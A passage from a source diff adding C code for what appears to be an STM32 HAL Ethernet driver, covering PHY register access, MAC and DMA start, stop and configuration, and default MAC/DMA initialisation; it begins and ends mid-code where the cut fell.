HAL_ETH_ReadPHYRegister(ETH_HandleTypeDef *heth, uint16_t PHYReg, uint32_t *RegValue) +{ + uint32_t tmpreg1 = 0U; + uint32_t tickstart = 0U; + + /* Check parameters */ + assert_param(IS_ETH_PHY_ADDRESS(heth->Init.PhyAddress)); + + /* Check the ETH peripheral state */ + if(heth->State == HAL_ETH_STATE_BUSY_RD) + { + return HAL_BUSY; + } + /* Set ETH HAL State to BUSY_RD */ + heth->State = HAL_ETH_STATE_BUSY_RD; + + /* Get the ETHERNET MACMIIAR value */ + tmpreg1 = heth->Instance->MACMIIAR; + + /* Keep only the CSR Clock Range CR[2:0] bits value */ + tmpreg1 &= ~ETH_MACMIIAR_CR_MASK; + + /* Prepare the MII address register value */ + tmpreg1 |=(((uint32_t)heth->Init.PhyAddress << 11U) & ETH_MACMIIAR_PA); /* Set the PHY device address */ + tmpreg1 |=(((uint32_t)PHYReg<<6U) & ETH_MACMIIAR_MR); /* Set the PHY register address */ + tmpreg1 &= ~ETH_MACMIIAR_MW; /* Set the read mode */ + tmpreg1 |= ETH_MACMIIAR_MB; /* Set the MII Busy bit */ + + /* Write the result value into the MII Address register */ + heth->Instance->MACMIIAR = tmpreg1; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check for the Busy flag */ + while((tmpreg1 & ETH_MACMIIAR_MB) == ETH_MACMIIAR_MB) + { + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > PHY_READ_TO) + { + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + return HAL_TIMEOUT; + } + + tmpreg1 = heth->Instance->MACMIIAR; + } + + /* Get MACMIIDR value */ + *RegValue = (uint16_t)(heth->Instance->MACMIIDR); + + /* Set ETH HAL State to READY */ + heth->State = HAL_ETH_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Writes to a PHY register. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param PHYReg PHY register address, is the index of one of the 32 PHY register. + * This parameter can be one of the following values: + * PHY_BCR: Transceiver Control Register. + * More PHY register could be written depending on the used PHY + * @param RegValue the value to write + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_WritePHYRegister(ETH_HandleTypeDef *heth, uint16_t PHYReg, uint32_t RegValue) +{ + uint32_t tmpreg1 = 0U; + uint32_t tickstart = 0U; + + /* Check parameters */ + assert_param(IS_ETH_PHY_ADDRESS(heth->Init.PhyAddress)); + + /* Check the ETH peripheral state */ + if(heth->State == HAL_ETH_STATE_BUSY_WR) + { + return HAL_BUSY; + } + /* Set ETH HAL State to BUSY_WR */ + heth->State = HAL_ETH_STATE_BUSY_WR; + + /* Get the ETHERNET MACMIIAR value */ + tmpreg1 = heth->Instance->MACMIIAR; + + /* Keep only the CSR Clock Range CR[2:0] bits value */ + tmpreg1 &= ~ETH_MACMIIAR_CR_MASK; + + /* Prepare the MII register address value */ + tmpreg1 |=(((uint32_t)heth->Init.PhyAddress<<11U) & ETH_MACMIIAR_PA); /* Set the PHY device address */ + tmpreg1 |=(((uint32_t)PHYReg<<6U) & ETH_MACMIIAR_MR); /* Set the PHY register address */ + tmpreg1 |= ETH_MACMIIAR_MW; /* Set the write mode */ + tmpreg1 |= ETH_MACMIIAR_MB; /* Set the MII Busy bit */ + + /* Give the value to the MII data register */ + heth->Instance->MACMIIDR = (uint16_t)RegValue; + + /* Write the result value into the MII Address register */ + heth->Instance->MACMIIAR = tmpreg1; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check for the Busy flag */ + while((tmpreg1 & ETH_MACMIIAR_MB) == ETH_MACMIIAR_MB) + { + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > PHY_WRITE_TO) + { + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + return HAL_TIMEOUT; + } + + tmpreg1 = heth->Instance->MACMIIAR; + } + + /* Set ETH HAL State to READY */ + heth->State = HAL_ETH_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup ETH_Exported_Functions_Group3 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Enable MAC and DMA transmission and reception. + HAL_ETH_Start(); + (+) Disable MAC and DMA transmission and reception. + HAL_ETH_Stop(); + (+) Set the MAC configuration in runtime mode + HAL_ETH_ConfigMAC(); + (+) Set the DMA configuration in runtime mode + HAL_ETH_ConfigDMA(); + +@endverbatim + * @{ + */ + + /** + * @brief Enables Ethernet MAC and DMA reception/transmission + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_Start(ETH_HandleTypeDef *heth) +{ + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set the ETH peripheral state to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + + /* Enable transmit state machine of the MAC for transmission on the MII */ + ETH_MACTransmissionEnable(heth); + + /* Enable receive state machine of the MAC for reception from the MII */ + ETH_MACReceptionEnable(heth); + + /* Flush Transmit FIFO */ + ETH_FlushTransmitFIFO(heth); + + /* Start DMA transmission */ + ETH_DMATransmissionEnable(heth); + + /* Start DMA reception */ + ETH_DMAReceptionEnable(heth); + + /* Set the ETH state to READY*/ + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop Ethernet MAC and DMA reception/transmission + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_Stop(ETH_HandleTypeDef *heth) +{ + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set the ETH peripheral state to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + + /* Stop DMA transmission */ + ETH_DMATransmissionDisable(heth); + + /* Stop DMA reception */ + ETH_DMAReceptionDisable(heth); + + /* Disable receive state machine of the MAC for reception from the MII */ + ETH_MACReceptionDisable(heth); + + /* Flush Transmit FIFO */ + ETH_FlushTransmitFIFO(heth); + + /* Disable transmit state machine of the MAC for transmission on the MII */ + ETH_MACTransmissionDisable(heth); + + /* Set the ETH state*/ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Set ETH MAC Configuration. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param macconf MAC Configuration structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_ConfigMAC(ETH_HandleTypeDef *heth, ETH_MACInitTypeDef *macconf) +{ + uint32_t tmpreg1 = 0U; + + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set the ETH peripheral state to BUSY */ + heth->State= HAL_ETH_STATE_BUSY; + + assert_param(IS_ETH_SPEED(heth->Init.Speed)); + assert_param(IS_ETH_DUPLEX_MODE(heth->Init.DuplexMode)); + + if (macconf != NULL) + { + /* Check the parameters */ + assert_param(IS_ETH_WATCHDOG(macconf->Watchdog)); + assert_param(IS_ETH_JABBER(macconf->Jabber)); + assert_param(IS_ETH_INTER_FRAME_GAP(macconf->InterFrameGap)); + assert_param(IS_ETH_CARRIER_SENSE(macconf->CarrierSense)); + assert_param(IS_ETH_RECEIVE_OWN(macconf->ReceiveOwn)); + assert_param(IS_ETH_LOOPBACK_MODE(macconf->LoopbackMode)); + assert_param(IS_ETH_CHECKSUM_OFFLOAD(macconf->ChecksumOffload)); + assert_param(IS_ETH_RETRY_TRANSMISSION(macconf->RetryTransmission)); + assert_param(IS_ETH_AUTOMATIC_PADCRC_STRIP(macconf->AutomaticPadCRCStrip)); + assert_param(IS_ETH_BACKOFF_LIMIT(macconf->BackOffLimit)); + assert_param(IS_ETH_DEFERRAL_CHECK(macconf->DeferralCheck)); + assert_param(IS_ETH_RECEIVE_ALL(macconf->ReceiveAll)); + assert_param(IS_ETH_SOURCE_ADDR_FILTER(macconf->SourceAddrFilter)); + assert_param(IS_ETH_CONTROL_FRAMES(macconf->PassControlFrames)); + assert_param(IS_ETH_BROADCAST_FRAMES_RECEPTION(macconf->BroadcastFramesReception)); + assert_param(IS_ETH_DESTINATION_ADDR_FILTER(macconf->DestinationAddrFilter)); + assert_param(IS_ETH_PROMISCUOUS_MODE(macconf->PromiscuousMode)); + assert_param(IS_ETH_MULTICAST_FRAMES_FILTER(macconf->MulticastFramesFilter)); + assert_param(IS_ETH_UNICAST_FRAMES_FILTER(macconf->UnicastFramesFilter)); + assert_param(IS_ETH_PAUSE_TIME(macconf->PauseTime)); + assert_param(IS_ETH_ZEROQUANTA_PAUSE(macconf->ZeroQuantaPause)); + assert_param(IS_ETH_PAUSE_LOW_THRESHOLD(macconf->PauseLowThreshold)); + assert_param(IS_ETH_UNICAST_PAUSE_FRAME_DETECT(macconf->UnicastPauseFrameDetect)); + assert_param(IS_ETH_RECEIVE_FLOWCONTROL(macconf->ReceiveFlowControl)); + assert_param(IS_ETH_TRANSMIT_FLOWCONTROL(macconf->TransmitFlowControl)); + assert_param(IS_ETH_VLAN_TAG_COMPARISON(macconf->VLANTagComparison)); + assert_param(IS_ETH_VLAN_TAG_IDENTIFIER(macconf->VLANTagIdentifier)); + + /*------------------------ ETHERNET MACCR Configuration --------------------*/ + /* Get the ETHERNET MACCR value */ + tmpreg1 = (heth->Instance)->MACCR; + /* Clear WD, PCE, PS, TE and RE bits */ + tmpreg1 &= ETH_MACCR_CLEAR_MASK; + + tmpreg1 |= (uint32_t)(macconf->Watchdog | + macconf->Jabber | + macconf->InterFrameGap | + macconf->CarrierSense | + (heth->Init).Speed | + macconf->ReceiveOwn | + macconf->LoopbackMode | + (heth->Init).DuplexMode | + macconf->ChecksumOffload | + macconf->RetryTransmission | + macconf->AutomaticPadCRCStrip | + macconf->BackOffLimit | + macconf->DeferralCheck); + + /* Write to ETHERNET MACCR */ + (heth->Instance)->MACCR = (uint32_t)tmpreg1; + + /* Wait until the write operation will be taken into account : + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACCR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACCR = tmpreg1; + + /*----------------------- ETHERNET MACFFR Configuration --------------------*/ + /* Write to ETHERNET MACFFR */ + (heth->Instance)->MACFFR = (uint32_t)(macconf->ReceiveAll | + macconf->SourceAddrFilter | + macconf->PassControlFrames | + macconf->BroadcastFramesReception | + macconf->DestinationAddrFilter | + macconf->PromiscuousMode | + macconf->MulticastFramesFilter | + macconf->UnicastFramesFilter); + + /* Wait until the write operation will be taken into account : + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACFFR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACFFR = tmpreg1; + + /*--------------- ETHERNET MACHTHR and MACHTLR Configuration ---------------*/ + /* Write to ETHERNET MACHTHR */ + (heth->Instance)->MACHTHR = (uint32_t)macconf->HashTableHigh; + + /* Write to ETHERNET MACHTLR */ + (heth->Instance)->MACHTLR = (uint32_t)macconf->HashTableLow; + /*----------------------- ETHERNET MACFCR Configuration --------------------*/ + + /* Get the ETHERNET MACFCR value */ + tmpreg1 = (heth->Instance)->MACFCR; + /* Clear xx bits */ + tmpreg1 &= ETH_MACFCR_CLEAR_MASK; + + tmpreg1 |= (uint32_t)((macconf->PauseTime << 16U) | + macconf->ZeroQuantaPause | + macconf->PauseLowThreshold | + macconf->UnicastPauseFrameDetect | + macconf->ReceiveFlowControl | + macconf->TransmitFlowControl); + + /* Write to ETHERNET MACFCR */ + (heth->Instance)->MACFCR = (uint32_t)tmpreg1; + + /* Wait until the write operation will be taken into account : + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACFCR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACFCR = tmpreg1; + + /*----------------------- ETHERNET MACVLANTR Configuration -----------------*/ + (heth->Instance)->MACVLANTR = (uint32_t)(macconf->VLANTagComparison | + macconf->VLANTagIdentifier); + + /* Wait until the write operation will be taken into account : + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACVLANTR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACVLANTR = tmpreg1; + } + else /* macconf == NULL : here we just configure Speed and Duplex mode */ + { + /*------------------------ ETHERNET MACCR Configuration --------------------*/ + /* Get the ETHERNET MACCR value */ + tmpreg1 = (heth->Instance)->MACCR; + + /* Clear FES and DM bits */ + tmpreg1 &= ~(0x00004800U); + + tmpreg1 |= (uint32_t)(heth->Init.Speed | heth->Init.DuplexMode); + + /* Write to ETHERNET MACCR */ + (heth->Instance)->MACCR = (uint32_t)tmpreg1; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACCR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACCR = tmpreg1; + } + + /* Set the ETH state to Ready */ + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Sets ETH DMA Configuration. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param dmaconf DMA Configuration structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_ConfigDMA(ETH_HandleTypeDef *heth, ETH_DMAInitTypeDef *dmaconf) +{ + uint32_t tmpreg1 = 0U; + + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set the ETH peripheral state to BUSY */ + heth->State= HAL_ETH_STATE_BUSY; + + /* Check parameters */ + assert_param(IS_ETH_DROP_TCPIP_CHECKSUM_FRAME(dmaconf->DropTCPIPChecksumErrorFrame)); + assert_param(IS_ETH_RECEIVE_STORE_FORWARD(dmaconf->ReceiveStoreForward)); + assert_param(IS_ETH_FLUSH_RECEIVE_FRAME(dmaconf->FlushReceivedFrame)); + assert_param(IS_ETH_TRANSMIT_STORE_FORWARD(dmaconf->TransmitStoreForward)); + assert_param(IS_ETH_TRANSMIT_THRESHOLD_CONTROL(dmaconf->TransmitThresholdControl)); + assert_param(IS_ETH_FORWARD_ERROR_FRAMES(dmaconf->ForwardErrorFrames)); + assert_param(IS_ETH_FORWARD_UNDERSIZED_GOOD_FRAMES(dmaconf->ForwardUndersizedGoodFrames)); + assert_param(IS_ETH_RECEIVE_THRESHOLD_CONTROL(dmaconf->ReceiveThresholdControl)); + assert_param(IS_ETH_SECOND_FRAME_OPERATE(dmaconf->SecondFrameOperate)); + assert_param(IS_ETH_ADDRESS_ALIGNED_BEATS(dmaconf->AddressAlignedBeats)); + assert_param(IS_ETH_FIXED_BURST(dmaconf->FixedBurst)); + assert_param(IS_ETH_RXDMA_BURST_LENGTH(dmaconf->RxDMABurstLength)); + assert_param(IS_ETH_TXDMA_BURST_LENGTH(dmaconf->TxDMABurstLength)); + assert_param(IS_ETH_ENHANCED_DESCRIPTOR_FORMAT(dmaconf->EnhancedDescriptorFormat)); + assert_param(IS_ETH_DMA_DESC_SKIP_LENGTH(dmaconf->DescriptorSkipLength)); + assert_param(IS_ETH_DMA_ARBITRATION_ROUNDROBIN_RXTX(dmaconf->DMAArbitration)); + + /*----------------------- ETHERNET DMAOMR Configuration --------------------*/ + /* Get the ETHERNET DMAOMR value */ + tmpreg1 = (heth->Instance)->DMAOMR; + /* Clear xx bits */ + tmpreg1 &= ETH_DMAOMR_CLEAR_MASK; + + tmpreg1 |= (uint32_t)(dmaconf->DropTCPIPChecksumErrorFrame | + dmaconf->ReceiveStoreForward | + dmaconf->FlushReceivedFrame | + dmaconf->TransmitStoreForward | + dmaconf->TransmitThresholdControl | + dmaconf->ForwardErrorFrames | + dmaconf->ForwardUndersizedGoodFrames | + dmaconf->ReceiveThresholdControl | + dmaconf->SecondFrameOperate); + + /* Write to ETHERNET DMAOMR */ + (heth->Instance)->DMAOMR = (uint32_t)tmpreg1; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->DMAOMR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->DMAOMR = tmpreg1; + + /*----------------------- ETHERNET DMABMR Configuration --------------------*/ + (heth->Instance)->DMABMR = (uint32_t)(dmaconf->AddressAlignedBeats | + dmaconf->FixedBurst | + dmaconf->RxDMABurstLength | /* !! if 4xPBL is selected for Tx or Rx it is applied for the other */ + dmaconf->TxDMABurstLength | + dmaconf->EnhancedDescriptorFormat | + (dmaconf->DescriptorSkipLength << 2U) | + dmaconf->DMAArbitration | + ETH_DMABMR_USP); /* Enable use of separate PBL for Rx and Tx */ + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->DMABMR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->DMABMR = tmpreg1; + + /* Set the ETH state to Ready */ + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup ETH_Exported_Functions_Group4 Peripheral State functions + * @brief Peripheral State functions + * + @verbatim + =============================================================================== + ##### Peripheral State functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + (+) Get the ETH handle state: + HAL_ETH_GetState(); + + + @endverbatim + * @{ + */ + +/** + * @brief Return the ETH HAL state + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL state + */ +HAL_ETH_StateTypeDef HAL_ETH_GetState(ETH_HandleTypeDef *heth) +{ + /* Return ETH state */ + return heth->State; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup ETH_Private_Functions + * @{ + */ + +/** + * @brief Configures Ethernet MAC and DMA with default parameters. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param err Ethernet Init error + * @retval HAL status + */ +static void ETH_MACDMAConfig(ETH_HandleTypeDef *heth, uint32_t err) +{ + ETH_MACInitTypeDef macinit; + ETH_DMAInitTypeDef dmainit; + uint32_t tmpreg1 = 0U; + + if (err != ETH_SUCCESS) /* Auto-negotiation failed */ + { + /* Set Ethernet duplex mode to Full-duplex */ + (heth->Init).DuplexMode = ETH_MODE_FULLDUPLEX; + + /* Set Ethernet speed to 100M */ + (heth->Init).Speed = ETH_SPEED_100M; + } + + /* Ethernet MAC default initialization **************************************/ + macinit.Watchdog = ETH_WATCHDOG_ENABLE; + macinit.Jabber = ETH_JABBER_ENABLE; + macinit.InterFrameGap = ETH_INTERFRAMEGAP_96BIT; + macinit.CarrierSense = ETH_CARRIERSENCE_ENABLE; + macinit.ReceiveOwn = ETH_RECEIVEOWN_ENABLE; + macinit.LoopbackMode = ETH_LOOPBACKMODE_DISABLE; + if(heth->Init.ChecksumMode == ETH_CHECKSUM_BY_HARDWARE) + { + macinit.ChecksumOffload = ETH_CHECKSUMOFFLAOD_ENABLE; + } + else + { + macinit.ChecksumOffload = ETH_CHECKSUMOFFLAOD_DISABLE; + } + macinit.RetryTransmission = ETH_RETRYTRANSMISSION_DISABLE; + macinit.AutomaticPadCRCStrip = ETH_AUTOMATICPADCRCSTRIP_DISABLE; + macinit.BackOffLimit = ETH_BACKOFFLIMIT_10; + macinit.DeferralCheck = ETH_DEFFERRALCHECK_DISABLE; + macinit.ReceiveAll = ETH_RECEIVEAll_DISABLE; + macinit.SourceAddrFilter = ETH_SOURCEADDRFILTER_DISABLE; + macinit.PassControlFrames = ETH_PASSCONTROLFRAMES_BLOCKALL; + macinit.BroadcastFramesReception = ETH_BROADCASTFRAMESRECEPTION_ENABLE; + macinit.DestinationAddrFilter = ETH_DESTINATIONADDRFILTER_NORMAL; + macinit.PromiscuousMode = ETH_PROMISCUOUS_MODE_DISABLE; + macinit.MulticastFramesFilter = ETH_MULTICASTFRAMESFILTER_PERFECT; + macinit.UnicastFramesFilter = ETH_UNICASTFRAMESFILTER_PERFECT; + macinit.HashTableHigh = 0x0U; + macinit.HashTableLow = 0x0U; + macinit.PauseTime = 0x0U; + macinit.ZeroQuantaPause = ETH_ZEROQUANTAPAUSE_DISABLE; + macinit.PauseLowThreshold = ETH_PAUSELOWTHRESHOLD_MINUS4; + macinit.UnicastPauseFrameDetect = ETH_UNICASTPAUSEFRAMEDETECT_DISABLE; + macinit.ReceiveFlowControl = ETH_RECEIVEFLOWCONTROL_DISABLE; + macinit.TransmitFlowControl = ETH_TRANSMITFLOWCONTROL_DISABLE; + macinit.VLANTagComparison = ETH_VLANTAGCOMPARISON_16BIT; + macinit.VLANTagIdentifier = 0x0U; + + /*------------------------ ETHERNET MACCR Configuration --------------------*/ + /* Get the ETHERNET MACCR value */ + tmpreg1 = (heth->Instance)->MACCR; + /* Clear WD, PCE, PS, TE and RE bits */ + tmpreg1 &= ETH_MACCR_CLEAR_MASK; + /* Set the WD bit according to ETH Watchdog value */ + /* Set the JD: bit according to ETH Jabber value */ + /* Set the IFG bit according to ETH InterFrameGap value */ + /* Set the DCRS bit according to ETH CarrierSense value */ + /* Set the FES bit according to ETH Speed value */ + /* Set the DO bit according to ETH ReceiveOwn value */ + /* Set the LM bit according to ETH LoopbackMode value */ + /* Set the DM bit according to ETH Mode value */ + /* Set the IPCO bit according to ETH ChecksumOffload value */ + /* Set the DR bit according to ETH RetryTransmission value */ + /* Set the ACS bit according to ETH AutomaticPadCRCStrip value */ + /* Set the BL bit according to ETH BackOffLimit value */ + /* Set the DC bit according to ETH DeferralCheck value */ + tmpreg1 |= (uint32_t)(macinit.Watchdog | + macinit.Jabber | + macinit.InterFrameGap | + macinit.CarrierSense | + (heth->Init).Speed | + macinit.ReceiveOwn | + macinit.LoopbackMode | + (heth->Init).DuplexMode | + macinit.ChecksumOffload | + macinit.RetryTransmission | + macinit.AutomaticPadCRCStrip | + macinit.BackOffLimit | + macinit.DeferralCheck); + + /* Write to ETHERNET MACCR */ + (heth->Instance)->MACCR = (uint32_t)tmpreg1; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACCR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACCR = tmpreg1; + + /*----------------------- ETHERNET MACFFR Configuration --------------------*/ + /* Set the RA bit according to ETH ReceiveAll value */ + /* Set the SAF and SAIF bits according to ETH SourceAddrFilter value */ + /* Set the PCF bit according to ETH PassControlFrames value */ + /* Set the DBF bit according to ETH BroadcastFramesReception value */ + /* Set the DAIF bit according to ETH DestinationAddrFilter value */ + /* Set the PR bit according to ETH PromiscuousMode value */ + /* Set the PM, HMC and HPF bits according to ETH MulticastFramesFilter value */ + /* Set the HUC and HPF bits according to ETH UnicastFramesFilter value */ + /* Write to ETHERNET MACFFR */ + (heth->Instance)->MACFFR = (uint32_t)(macinit.ReceiveAll | + macinit.SourceAddrFilter | + macinit.PassControlFrames | + macinit.BroadcastFramesReception | + macinit.DestinationAddrFilter | + macinit.PromiscuousMode | + macinit.MulticastFramesFilter | + macinit.UnicastFramesFilter); + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACFFR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACFFR = tmpreg1; + + /*--------------- ETHERNET MACHTHR and MACHTLR Configuration --------------*/ + /* Write to ETHERNET MACHTHR */ + (heth->Instance)->MACHTHR = (uint32_t)macinit.HashTableHigh; + + /* Write to ETHERNET MACHTLR */ + (heth->Instance)->MACHTLR = (uint32_t)macinit.HashTableLow; + /*----------------------- ETHERNET MACFCR Configuration -------------------*/ + + /* Get the ETHERNET MACFCR value */ + tmpreg1 = (heth->Instance)->MACFCR; + /* Clear xx bits */ + tmpreg1 &= ETH_MACFCR_CLEAR_MASK; + + /* Set the PT bit according to ETH PauseTime value */ + /* Set the DZPQ bit according to ETH ZeroQuantaPause value */ + /* Set the PLT bit according to ETH PauseLowThreshold value */ + /* Set the UP bit according to ETH UnicastPauseFrameDetect value */ + /* Set the RFE bit according to ETH ReceiveFlowControl value */ + /* Set the TFE bit according to ETH TransmitFlowControl value */ + tmpreg1 |= (uint32_t)((macinit.PauseTime << 16U) | + macinit.ZeroQuantaPause | + macinit.PauseLowThreshold | + macinit.UnicastPauseFrameDetect | + macinit.ReceiveFlowControl | + macinit.TransmitFlowControl); + + /* Write to ETHERNET MACFCR */ + (heth->Instance)->MACFCR = (uint32_t)tmpreg1; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACFCR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACFCR = tmpreg1; + + /*----------------------- ETHERNET MACVLANTR Configuration ----------------*/ + /* Set the ETV bit according to ETH VLANTagComparison value */ + /* Set the VL bit according to ETH VLANTagIdentifier value */ + (heth->Instance)->MACVLANTR = (uint32_t)(macinit.VLANTagComparison | + macinit.VLANTagIdentifier); + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACVLANTR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACVLANTR = tmpreg1; + + /* Ethernet DMA default initialization ************************************/ + dmainit.DropTCPIPChecksumErrorFrame = ETH_DROPTCPIPCHECKSUMERRORFRAME_ENABLE; + dmainit.ReceiveStoreForward = ETH_RECEIVESTOREFORWARD_ENABLE; + dmainit.FlushReceivedFrame = ETH_FLUSHRECEIVEDFRAME_ENABLE; + dmainit.TransmitStoreForward = ETH_TRANSMITSTOREFORWARD_ENABLE; + dmainit.TransmitThresholdControl = ETH_TRANSMITTHRESHOLDCONTROL_64BYTES; + dmainit.ForwardErrorFrames = ETH_FORWARDERRORFRAMES_DISABLE; + dmainit.ForwardUndersizedGoodFrames = ETH_FORWARDUNDERSIZEDGOODFRAMES_DISABLE; + dmainit.ReceiveThresholdControl = ETH_RECEIVEDTHRESHOLDCONTROL_64BYTES; + dmainit.SecondFrameOperate = ETH_SECONDFRAMEOPERARTE_ENABLE; + dmainit.AddressAlignedBeats = ETH_ADDRESSALIGNEDBEATS_ENABLE; + dmainit.FixedBurst = ETH_FIXEDBURST_ENABLE; + dmainit.RxDMABurstLength = ETH_RXDMABURSTLENGTH_32BEAT; + dmainit.TxDMABurstLength = ETH_TXDMABURSTLENGTH_32BEAT; + dmainit.EnhancedDescriptorFormat = ETH_DMAENHANCEDDESCRIPTOR_ENABLE; + dmainit.DescriptorSkipLength = 0x0U; + dmainit.DMAArbitration = ETH_DMAARBITRATION_ROUNDROBIN_RXTX_1_1; + + /* Get the ETHERNET DMAOMR value */ + tmpreg1 = (heth->Instance)->DMAOMR; + /* Clear xx bits */ + tmpreg1 &= ETH_DMAOMR_CLEAR_MASK; + + /* Set the DT bit according to ETH DropTCPIPChecksumErrorFrame value */ + /* Set the RSF bit according to ETH ReceiveStoreForward value */ + /* Set the DFF bit according to ETH FlushReceivedFrame value */ + /* Set the TSF bit according to ETH TransmitStoreForward value */ + /* Set the TTC bit according to ETH TransmitThresholdControl value */ + /* Set the FEF bit according to ETH ForwardErrorFrames value */ + /* Set the FUF bit according to ETH ForwardUndersizedGoodFrames value */ + /* Set the RTC bit according to ETH ReceiveThresholdControl value */ + /* Set the OSF bit according to ETH SecondFrameOperate value */ + tmpreg1 |= (uint32_t)(dmainit.DropTCPIPChecksumErrorFrame | + dmainit.ReceiveStoreForward | + dmainit.FlushReceivedFrame | + dmainit.TransmitStoreForward | + dmainit.TransmitThresholdControl | + dmainit.ForwardErrorFrames | + dmainit.ForwardUndersizedGoodFrames | + dmainit.ReceiveThresholdControl | + dmainit.SecondFrameOperate); + + /* Write to ETHERNET DMAOMR */ + (heth->Instance)->DMAOMR = (uint32_t)tmpreg1; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->DMAOMR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->DMAOMR = tmpreg1; + + /*----------------------- ETHERNET DMABMR Configuration ------------------*/ + /* Set the AAL bit according to ETH AddressAlignedBeats value */ + /* Set the FB bit according to ETH FixedBurst value */ + /* Set the RPBL and 4*PBL bits according to ETH RxDMABurstLength value */ + /* Set the PBL and 4*PBL bits according to ETH TxDMABurstLength value */ + /* Set the Enhanced DMA descriptors bit according to ETH EnhancedDescriptorFormat value*/ + /* Set the DSL bit according to ETH DesciptorSkipLength value */ + /* Set the PR and DA bits according to ETH DMAArbitration value */ + (heth->Instance)->DMABMR = (uint32_t)(dmainit.AddressAlignedBeats | + dmainit.FixedBurst | + dmainit.RxDMABurstLength | /* !! if 4xPBL is selected for Tx or Rx it is applied for the other */ + dmainit.TxDMABurstLength | + dmainit.EnhancedDescriptorFormat | + (dmainit.DescriptorSkipLength << 2U) | + dmainit.DMAArbitration | + ETH_DMABMR_USP); /* Enable use of separate PBL for Rx and Tx */ + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->DMABMR; + HAL_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->DMABMR = tmpreg1; + + if((heth->Init).RxMode == ETH_RXINTERRUPT_MODE) + { + /* Enable the Ethernet Rx Interrupt */ + __HAL_ETH_DMA_ENABLE_IT((heth), ETH_DMA_IT_NIS | 